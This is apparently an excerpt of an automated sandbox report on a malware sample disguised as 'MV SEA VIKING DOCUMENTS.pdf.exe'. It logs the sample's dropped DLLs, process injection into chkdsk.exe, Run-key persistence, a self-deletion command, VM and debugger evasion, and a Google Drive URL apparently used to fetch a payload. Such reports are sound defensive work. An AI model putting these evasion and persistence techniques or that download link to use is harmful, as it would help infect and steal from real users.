      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\chkdsk.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: chkdsk.pdbGCTL source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: cliconfg.pdb source: cliconfg.dll.0.dr
      Source: Binary string: mshtml.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: raschapext.pdb source: raschapext.dll.0.dr
      Source: Binary string: raschapext.pdbGCTL source: raschapext.dll.0.dr
      Source: Binary string: chkdsk.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: usp10.pdb source: usp10.dll.0.dr
      Source: Binary string: ProvMigrate.pdb source: provmigrate.dll.0.dr
      Source: Binary string: mshtml.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cliconfg.pdbGCTL source: cliconfg.dll.0.dr
      Source: Binary string: ProvMigrate.pdbGCTL source: provmigrate.dll.0.dr
      Source: Binary string: usp10.pdbGCTL source: usp10.dll.0.dr

      Data Obfuscation

      Source: Yara matchFile source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000000.4671499105.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001E.00000002.4676824720.0000000002B50000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.2299445190.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_714930C0 push eax; ret 0_2_714930EE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452A5E pushad ; retf 0000h0_2_02452A5F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452A69 push ebp; retf 0000h0_2_02452A6A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245501E push edi; ret 0_2_0245502E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452C80 push es; iretd 0_2_02452C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245557F pushad ; retn 0004h0_2_02455586
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245251D pushfd ; iretd 0_2_02452523
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D08CD push ecx; mov dword ptr [esp], ecx13_2_1F1D08D6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A97A1 push es; iretd 13_2_1F1A97A8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A21AD pushad ; retf 0004h13_2_1F1A223F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F97A1 push es; iretd 21_2_053F97A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F21AD pushad ; retf 0004h21_2_053F223F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054208CD push ecx; mov dword ptr [esp], ecx21_2_054208D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00876154 push edi; iretd 21_2_00876155
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088629B push esi; iretd 21_2_0088629C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088C482 push edi; ret 21_2_0088C484
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B7D5 push eax; ret 21_2_0088B828
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B88C push eax; ret 21_2_0088B892
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B82B push eax; ret 21_2_0088B892
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B822 push eax; ret 21_2_0088B828
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00888A41 pushfd ; iretd 21_2_00888A4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885B26 push ss; ret 21_2_00885B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088BC64 push ss; ret 21_2_0088BC65
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885D08 push ds; ret 21_2_00885D14
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885FCF push ecx; iretd 21_2_00885FD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088AF62 push ebp; ret 21_2_0088AF67
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C08CD push ecx; mov dword ptr [esp], ecx35_2_1F1C08D6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_01662484 pushad ; retf 0000h35_2_01662485
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166248F push ebp; retf 0000h35_2_01662490
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_016626A6 push es; iretd 35_2_016626BE
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_01664A44 push edi; ret 35_2_01664A54
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_71491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71491BFF
      Source: cliconfg.dll.0.drStatic PE information: 0xBD736329 [Sat Sep 20 16:24:09 2070 UTC]
      Source: provmigrate.dll.0.drStatic PE information: section name: .didat
      Source: raschapext.dll.0.drStatic PE information: section name: .didat
      Source: usp10.dll.0.drStatic PE information: section name: .00cfg
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\cliconfg.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\usp10.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\provmigrate.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\raschapext.dll
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile created: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A22764B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,33_2_00000244A22764B2
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: Possible double extension: pdf.exeStatic PE information: MV SEA VIKING DOCUMENTS.pdf.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\qga\qga.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1_L7ZIPGVNC4_SHW57WLJYSN0GUBSQWED
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe TID: 5816Thread sleep count: 576 > 30
      Source: C:\Windows\explorer.exe TID: 5532Thread sleep time: -250000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8760Thread sleep count: 117 > 30
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8760Thread sleep time: -234000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeWindow / User API: threadDelayed 576
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI coverage: 1.3 %
      Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 2.6 %
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI coverage: 1.3 %
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cliconfg.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\provmigrate.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\raschapext.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_024506CE rdtsc 0_2_024506CE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-8197
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-8353
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_30-3381
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_30-3377
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_34-3460
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2475947492.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2722780780.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530041427.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4818912953.00000000019E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp!
      Source: shmhprg0nvltzt.exe, 00000023.00000003.4810603799.0000000001A8E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819883772.0000000001A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000010.00000000.2474170391.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588169195.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720572878.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2527930147.000000000F5F6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWiles\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dllcqs
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: firefox.exe, 00000021.00000002.4638084914.00000244A23C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA90 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA89 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA89
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,30_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00406873 FindFirstFileW,FindClose,30_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040290B FindFirstFileW,30_2_0040290B
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,34_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00406873 FindFirstFileW,FindClose,34_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040290B FindFirstFileW,34_2_0040290B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSystem information queried: ModuleInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_71491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71491BFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245FC11 mov eax, dword ptr fs:[00000030h]0_2_0245FC11
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02458BDC mov eax, dword ptr fs:[00000030h]0_2_02458BDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245DB94 mov eax, dword ptr fs:[00000030h]0_2_0245DB94
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245787B mov eax, dword ptr fs:[00000030h]0_2_0245787B
